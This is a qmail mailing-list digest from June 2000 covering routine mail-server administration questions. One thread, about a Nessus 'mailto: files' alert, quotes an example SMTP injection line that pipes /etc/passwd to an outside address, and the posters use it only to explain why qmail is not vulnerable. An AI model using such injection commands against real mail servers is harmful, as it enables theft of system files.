qmail Digest 3 Jun 2000 10:00:00 -0000 Issue 1021 Topics (messages 42592 through 42618): Re: Translating qmail messages. 42592 by: Rodrigo Severo 42596 by: James Raftery Forwarding a Mail to other Mailserver 42593 by: Tushar.Shah.snstech.com 42594 by: Greg Owen Redhat 6.2 and PAM 42595 by: Michael Heitland What POP/IMAP servers are best? 42597 by: Enrique Vadillo 42604 by: Uelinton B. dos Santos 42607 by: "Próspero, Esteban" what should the MAIL variable equal 42598 by: John Stile 42600 by: Johan Almqvist 42601 by: John Stile q: vacation message.. qmail-vacation.. 42599 by: Anton PIrnat What to do about FAQ 5.4 Security note (password insecure) 42602 by: John Stile 42603 by: Petr Novotny Announcing qmail-qfilter version 1.3 42605 by: Bruce Guenter Howto setup multiple postmasters 42606 by: John Anderson Re: Qmail: problems with SMTP e Qmailadmin 42608 by: "Próspero, Esteban" virtualdomains question 42609 by: Mike Denka Queue cleaning: spam problem 42610 by: Jon Rust security hole? 42611 by: Bob Waskosky 42612 by: Jim Breton 42613 by: Bob Waskosky 42614 by: Jim Breton 42615 by: Bob Waskosky 42616 by: Russell Nelson 42617 by: Bob Waskosky 42618 by: Jim Breton Administrivia: To unsubscribe from the digest, e-mail: [EMAIL PROTECTED] To subscribe to the digest, e-mail: [EMAIL PROTECTED] To bug my human owner, e-mail: [EMAIL PROTECTED] To post to the list, e-mail: [EMAIL PROTECTED] ----------------------------------------------------------------------
> This will not work unless you put a space on the (currently) blank > line in the paragraph above. Without a space, the Portugese text gets > interpreted by QSBMF readers as an email address and cause for the > bounce. > > Otherwise, I see no reason why it shouldn't work, as long as you don't > break QSBMF. First of all, thanks for your answer, but please don't mind me asking, what is QSBMF? I think I should know more about it before I start translating qmail messages. BTW, is there a single place for qmail messages or do I have to look in all executables? Any clues about where to look for them? TIAAA, Rodrigo Severo
On Fri, Jun 02, 2000 at 09:14:02AM -0300, Rodrigo Severo wrote: > what is QSBMF? I think I should know more about it before I start > translating qmail messages. The "qmail-send Bounce Message Format": http://cr.yp.to/proto/qsbmf.txt Regards, james -- James Raftery (JBR54) - Programmer Hostmaster - IE TLD Hostmaster IE Domain Registry - www.domainregistry.ie - (+353 1) 706 2375 "Managing 4000 customer domains with BIND has been a lot like herding cats." - Mike Batchelor, on [EMAIL PROTECTED]
Hello, I have Domino server running R5 and set all the users and groups on to it. I would like to set up Qmail on my Red Hat linux 6.1 and would like to set it up for sending and receiving mail for my domain. At this moment Domino is doing this job. I want qmail to send and receive mail. The mail which qmail would receive should get forwarded to my existing domino server. How do I do this without setting up all the users or groups which I set on Domino server. Please help me on this. Thanks in advance, Tushar Shah
> I want qmail to send and receive mail. The mail which > qmail would receive should get forwarded to my existing > domino server. How do I do this without setting up all > the users or groups which I set on Domino server. Let's say that for domain foo.com you want your qmail relay (qmail.foo.com) to forward all mail to your Domino server (domino.foo.com). On qmail.foo.com, put 'foo.com' in rcpthosts and 'foo.com:domino.foo.com' in smtproutes. Make sure that 'foo.com' is not in locals or virtualdomains on qmail.foo.com. This will mean that qmail.foo.com accepts mail for foo.com (rcpthosts) and that all mail for foo.com is forwarded to domino.foo.com (smtproutes). Once you've set the qmail box up and tested it, modify your DNS so that your MX records point to qmail.foo.com instead of domino.foo.com. -- gowen -- Greg Owen -- [EMAIL PROTECTED]
I am not able to get checkpassword and qmail-pop3d to work with pam. I have run two different diffs on the checkpasswd before compiling and still no luck. Any one else been able to get this distro to work? Michael Heitland Data Systems Engineer 702 communications (218)-284-5702 (p)1-888-462-4508
Hi all, I have some 15.000 users in my system and i'm currently testing qmail with Maildirs (btw i need/want to use Maildirs over NFS), the problem i see is that since Maildirs change a tiny bit the way my pop and imap servers work (in other words, my current daemons won't work), so i was wondering whether you'd have suggestions on what POP and IMAP servers i should use with qmail with maildirs so i can have the best performance i can get. Of course i'd like to change *nothing* in my users' PCs (especially regarding POP clients!) however IMAP i can handle any client changes very easily. Thanks a lot for any ideas! Enrique-
Hi Enrique Take a look of Courier-IMAP at http://www.inter7.com/courierimap Uelinton Enrique Vadillo wrote: > Hi all, > > I have some 15.000 users in my system and i'm currently testing qmail with > Maildirs (btw i need/want to use Maildirs over NFS), the problem i see is > that since Maildirs change a tiny bit the way my pop and imap servers work > (in other words, my current daemons won't work), so i was wondering whether > you'd have suggestions on what POP and IMAP servers i should use with qmail > with maildirs so i can have the best performance i can get.
Hi! The pop3 server that works with qmail (Maildir format, more exactly) is qmail-pop3d that comes with qmail. All you have to do is to set this pop3 server up (just as you made with your smtp server) after you have put down your old pop server. Read the FAQ for more instructions of how to set it up with inetd or tcpserver. Luck! Esteban Javier Próspero > -----Original Message----- > From: Uelinton B. dos Santos [SMTP:[EMAIL PROTECTED]] > Sent: Friday, June 02, 2000 3:05 PM > To: Enrique Vadillo > Cc: [EMAIL PROTECTED] > Subject: Re: What POP/IMAP servers are best? > > Hi Enrique > > Take a look of Courier-IMAP at http://www.inter7.com/courierimap > > > > > Uelinton > > Enrique Vadillo wrote: > > > Hi all, > > > > I have some 15.000 users in my system and i'm currently testing qmail > with > > Maildirs (btw i need/want to use Maildirs over NFS), the problem i see > is > > that since Maildirs change a tiny bit the way my pop and imap servers > work > > (in other words, my current daemons won't work), so i was wondering > whether > > you'd have suggestions on what POP and IMAP servers i should use with > qmail > > with maildirs so i can have the best performance i can get.
What should $MAIL equal for local accounts on a linux server? I'm on linux, redhat6.2, and in /etc/profile I set MAIL=~/Maildir/ When I login, I get the message: "You have mail. bash: MAIL=/home/jstile/Maildir/: No such file or directory" listing my home dir, I see that Maildir does exist: drwx------ 5 jstile jstile 4096 May 10 17:16 Maildir/ listing the Maildir, I see the correct subdir's: drwx------ 2 jstile jstile 4096 May 10 17:16 cur/ drwx------ 2 jstile jstile 4096 May 16 00:24 new/ drwx------ 2 jstile jstile 4096 May 16 00:24 tmp/ I used /var/qmail/bin/maildirmake to make the Maildir in each users home. But I can't check my mail. I read the FAQ's, and it didn't help me to fix this problem. If there is a specific doc for this please let me know.
On Fri, Jun 02, 2000 at 09:12:01AM -0700, John Stile wrote: > What should $MAIL equal for local accounts on a linux server? > But I can't check my mail. What mail client (MUA) are you using? Are you sure it's maildir-aware? > I read the FAQ's, and it didn't help me to fix this problem. > If there is a specific doc for this please let me know. -Johan -- Johan Almqvist
not sure. I think it's pine Johan Almqvist wrote: > On Fri, Jun 02, 2000 at 09:12:01AM -0700, John Stile wrote: > > What should $MAIL equal for local accounts on a linux server? > > But I can't check my mail. > > What mail client (MUA) are you using? Are you sure it's maildir-aware? > > > I read the FAQ's, and it didn't help me to fix this problem. > > If there is a specific doc for this please let me know. > > -Johan > -- > Johan Almqvist
hi there, anyone who tried out qmail-vacation script (Peter Samuel) together with vpopmail? As far i can see it wont use virtual domains as vpopmail is used to do... i got the mail.. but no vacation message, nor any failure in my logs (var/log/messages, var/log/mail). I tried several changes and also several .qmail-user files.. current one contains a.. --".qmail-u_name"-- | /usr/local/bin/vacation -j username /var/qmail/vpopmail/domains/domain/ ---- and i´d also put a ".vacation.msg " into /var/qmail/vpopmail/domains/domain/u_name and .. (just to make sure its not my old brain) /var/qmail/vpopmail/domains/d_name/u_name/Maildir/ At the vacation makefile i´d set up qmail mailbox file at .. $$home/Maildir (i guess its one of the probs i have..). I assume i only have to change less at the vacation perl script, but dunno where to serach for and what to put in, i guess i am getting older. Maybe there is a list with all valid qmail ENV variables that helps? I can.. cook homemade noodles and jelly (not together), repair cars and build computers, build up networks, support our customers and lots others.. but have less scripting perl knowledge (yet, but i am hardly working on...) What i forgot to ask for now? Isn´t it time to leave work now? it seems to be.. regards Anton Pirnat -- --- this message is shareware, please register! --------------------------------------------------------- pmg Medien und Service GmbH phone: +49 711 6574500 Schenkendorfstr. 17 fax: +49 711 6574501 D-70193 Stuttgart www: www.pop-stuttgart.net Anton Pirnat, Hostmaster email: [EMAIL PROTECTED]
If pop3d is insecure, what is secure? I don't want to setup something that is broken from the get-go.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 2 Jun 00, at 10:47, John Stile wrote: > If pop3d is insecure, what is secure? > I don't want to setup something that is broken from the get-go. POP3 protocol is insecure because it requires transmitting password in plaintext over a network. (If you have pop3 only on a switched LAN with no option of sniffing, pop3 is perfectly safe.) APOP is a safer alternative of pop (and I believe qmail supports APOP as well) but it requires APOP-capable clients. You may also try to setup POP3 through SSL tunnel or over SSH port forwarding (both setups are safe). [I don't know if IMAP is secure or insecure in password transmission; I never liked the beast.] -----BEGIN PGP SIGNATURE----- Version: PGP 6.0.2 -- QDPGP 2.60 Comment: http://community.wow.net/grt/qdpgp.html iQA/AwUBOTfl/FMwP8g7qbw/EQIsjwCff9lJHRNycu1PxIFp3RzHpI7d5XQAoKuj ZNrMfOsIwpBFWfx+rc65BI0C =r111 -----END PGP SIGNATURE----- -- Petr Novotny, ANTEK CS [EMAIL PROTECTED] http://www.antek.cz PGP key ID: 0x3BA9BC3F -- Don't you know there ain't no devil there's just God when he's drunk. [Tom Waits]
Version 1.3 of qmail-qfilter is now available at: http://em.ca/~bruceg/qmail-qfilter/ See the documentation there for more details, or join the mailing list by sending an email to: [EMAIL PROTECTED] Development versions of qmail-qfilter are available via anonymous CVS. Set your CVSROOT to ":pserver:[EMAIL PROTECTED]:/CVS", login with an empty password, and check out the qmail-qfilter module. ------------------------------------------------------------------------------- Changes in version 1.3 - A new environment variable, "QMAILRCPTS" is set to a newline-seperated list of the recipients. Note that if a large number of recipients are encountered (ex more than 64KB worth under Linux), this will cause execution of the filters to fail and the message will be rejected. I consider this acceptable, since 64KB worth of recipients is likely more than 1000 anyways. - Removed some GNU-specific constructs from the source and Makefile. - Included a sample MIME filename extension scanning filter. ------------------------------------------------------------------------------- -- Bruce Guenter <[EMAIL PROTECTED]> http://em.ca/~bruceg/
Hi, I currently have qmail setup, working, and running 7 seperate virtual mail servers. (Using /control/virtualhosts and /control/rcpthosts). Also, possibly a sticking point, each user does not have an account on the mail server, it is setup that there is 1 popuser. My question is, how do I setup an account (postmaster) to catch all mis-addressed email, and send it to the proper contact at said domain. Example: Tom is the contact at xyz.com An email comes into [EMAIL PROTECTED] Currently the email goes nowhere. I would like the email to goto [EMAIL PROTECTED] I would also like mail addressed to [EMAIL PROTECTED] to bounce to my contact at asdf.com I know I can set it up so all bounces go to 1 email address, but that doesn't really isn't my ideal situation. Any help would be appreciated. --John
Hi! I have 200 +/- users into 0,1 y default directories and my users can authenticate via qmailadmin. You should try the qmailadmin mailing [EMAIL PROTECTED] Regards! Esteban Javier Próspero > -----Original Message----- > From: Edilmar Alves [SMTP:[EMAIL PROTECTED]] > Sent: Tuesday, May 30, 2000 8:57 PM > To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; > [EMAIL PROTECTED] > Subject: Qmail: problems with SMTP e Qmailadmin > > Hi all, > > I'd like to solve the following problems: > 1. SMTP: I configured tcp.smtp like this, to accept > e-mails only for these IP subnets: > 192.168.0.:allow,RELAYCLIENT="" > 192.168.1.:allow,RELAYCLIENT="" > 200.241.184.:allow,RELAYCLIENT="" > However, I entered from other ISP, with > address 200.212.255.25 and SMTP sents > my email. I boot Linux but the same behaviour > continues to occurr. > 2. QMailAdmin: for 10, 20, 50 users, I think > QMailAdmin is very nice. However, I already > have more than 600 users, and when I enter > with postmaster, to administer the email accounts, > I have to spent more than FIVE minutes, using > Netscape. I'm using the "graphical interface" from > lynx, cause performance !!! > Is there a way to change the HTML skeleton pages > to show only the buttons, NOT the users list. I think > the access may be faster than. > 2. QMailAdmin II: I created some users (+/- 103 users) > into a domain. All Maildir folders was created into > .../domains/fes.br/ (fes.br is my domain). After these 103, > folders like 0/, 1/, ... was created automatically by QMail. > At this point, no problems! > However, if one of these new users created into these folders > try to use QMailAdmin to change password, the system arises > an exception talking about "There already is a user logged with > postmaster" (something like this) and the new doesnt get to > change your password. I have to change password user per > user, with postmaster account. > The major users were created with QMailAdmin and some with > vadduser. Both users arises the exception. > The strange is: the first users created get to change password > into Web QMailAdmin...
We are an isp who has used sendmail for many years and we are converting to qmail. In sendmail we have traditionally used the virtual user table to allow customers to use a commonly used mailbox like 'webmaster', for example, at their domain. In the virtusertable on sendmail, if you put only [EMAIL PROTECTED] in the virtusertable, then any other mailbox address for that domain, [EMAIL PROTECTED] for example, will automatically default to fred@ our default domain. With qmail's virtual user processing, there is no local delivery if 'fred' is not specified in either the virtual user table itself or in the dot qmail file in the delivery address specified for the virtual domain. I'm wondering if there is some way to imitate sendmail's default behavior in qmail's virtualdomains file or some other qmail control file that I don't know about yet. It is very important for us to be able to deliver local mail to [EMAIL PROTECTED] to [EMAIL PROTECTED] by default - i.e. without having to create a .qmail-anyuser file in the delivery mailbox for customers.domain for each potential recipient. The reason is that in one virtual domain case we have literally thousands of such recipients and only a handful of special delivery cases that will have .qmail files. Is there a simple way to do this? Thanks, Mike
One of my customers upgraded or changed their mail system yesterday and opened it up for relay by accident. That was bad. Worse is that they use us as a "smart relay" (which I didn't know until today). SO now I've got all this mail queued up waiting to go out to hundreds and thousands of people. Are there scripts available that I can use to search through the queue, look for a particular subject/Received line/whatever and ax it? Thanks, jon "leaving to smack this customer..."
Hi I scanned myself online using nessus/nmap (scanning my dynamic IP) and received an email from nessus stating: Your MTA is vulnerable to the 'mailto: files' attack. Is this a hole or a false positive because I,m scanning myself? Any ideas how to fix this? Thanks in advance Bob -- I fish therefore I lie. Bob Waskosky <[EMAIL PROTECTED]> The Perl Zone - http://www.nobhead.com/perl/ -----------------------------------------------------
On Fri, Jun 02, 2000 at 10:58:51PM -0500, Bob Waskosky wrote: > Your MTA is vulnerable to the 'mailto: files' attack. Is this a hole or a false >positive because I,m scanning myself? Any ideas how to fix this? I believe Nessus (correct me if I'm wrong) is trying to send a mail message to a program like this: rcpt to: | programname in which case qmail doesn't handle it specially, it is probably getting picked up by your .qmail-default in ~alias (or getting bounced, if you don't have one).
On Sat, Jun 03, 2000 at 04:09:21AM +0000, Jim Breton wrote: > On Fri, Jun 02, 2000 at 10:58:51PM -0500, Bob Waskosky wrote: > > Your MTA is vulnerable to the 'mailto: files' attack. Is this a hole or a false >positive because I,m scanning myself? Any ideas how to fix this? > > > I believe Nessus (correct me if I'm wrong) is trying to send a mail > message to a program like this: > > rcpt to: | programname > > in which case qmail doesn't handle it specially, it is probably getting > picked up by your .qmail-default in ~alias (or getting bounced, if you > don't have one). > Is this a hole and how would I plug it? Thanks -- I fish therefore I lie. Bob Waskosky <[EMAIL PROTECTED]> The Perl Zone - http://www.nobhead.com/perl/ -----------------------------------------------------
On Fri, Jun 02, 2000 at 11:17:30PM -0500, Bob Waskosky wrote: > Is this a hole and how would I plug it? No it's not a hole. It would only be a security concern if your mailer were to allow the message to actually be piped directly to the program specified in the "rcpt to" command. Say for example I were to send this command: rcpt to: "|mail [EMAIL PROTECTED] < /etc/passwd" or something similar. And your MTA happily piped my message to that program, which also took /etc/passwd as input and mailed it to me at [EMAIL PROTECTED] _That_ would be a problem. With qmail however, pipe symbols are not treated specially and don't have the same meaning as they would in a shell. They are handled as though they are part of a username, and since you don't have a local user "|mail" the message is treated as any normal message to an unknown user. You don't need to change anything. :) Nessus assumes that because your mailer "accepted" the message, it will also deliver it in an "evil" way... which qmail won't do.
On Sat, Jun 03, 2000 at 04:29:07AM +0000, Jim Breton wrote: > On Fri, Jun 02, 2000 at 11:17:30PM -0500, Bob Waskosky wrote: > > Is this a hole and how would I plug it? > > > No it's not a hole. It would only be a security concern if your mailer > were to allow the message to actually be piped directly to the program > specified in the "rcpt to" command. > > Say for example I were to send this command: > > rcpt to: "|mail [EMAIL PROTECTED] < /etc/passwd" > > or something similar. And your MTA happily piped my message to that > program, which also took /etc/passwd as input and mailed it to me at > [EMAIL PROTECTED] _That_ would be a problem. > > With qmail however, pipe symbols are not treated specially and don't > have the same meaning as they would in a shell. They are handled as > though they are part of a username, and since you don't have a local > user "|mail" the message is treated as any normal message to an unknown > user. > > You don't need to change anything. :) Nessus assumes that because your > mailer "accepted" the message, it will also deliver it in an "evil" > way... which qmail won't do. > kewl. Thanks for the info. -- I fish therefore I lie. Bob Waskosky <[EMAIL PROTECTED]> The Perl Zone - http://www.nobhead.com/perl/ -----------------------------------------------------
Bob Waskosky writes: > > rcpt to: | programname > Is this a hole and how would I plug it? It's not a hole. It's someone trying to send mail to the email address "| programname". The vertical bar is odd, yes. The space is even more unusual, yes. But a security hole? No. It would be if qmail were to interpret the | specially, as certain versions of other MTA's have in the past. But qmail is neither that naive nor trusting. -- -russ nelson <[EMAIL PROTECTED]> http://russnelson.com Crynwr sells support for free software | PGPok | "Ask not what your country 521 Pleasant Valley Rd. | +1 315 268 1925 voice | can force other people to Potsdam, NY 13676-3213 | +1 315 268 9201 FAX | do for you..." -Perry M.
I think the example line in your reply triggered a virus alert. I received an email stating the reply I sent possibly contained a password stealing virus. I hope that was just triggered by your example. I don't believe I have any viruses on this machine. -- I fish therefore I lie. Bob Waskosky <[EMAIL PROTECTED]> The Perl Zone - http://www.nobhead.com/perl/ -----------------------------------------------------
On Sat, Jun 03, 2000 at 12:00:29AM -0500, Bob Waskosky wrote: > I think the example line in your reply triggered a virus alert. > I received an email stating the reply I sent possibly contained a password stealing >virus. I hope that was just triggered by your example. I don't believe I have any >viruses on this machine. Yah I got the same thing in response to my own message (the one that included the pipe). I've sent an e-mail to both the intended recipient and to the support@whatever address supplied in the bounce message. :P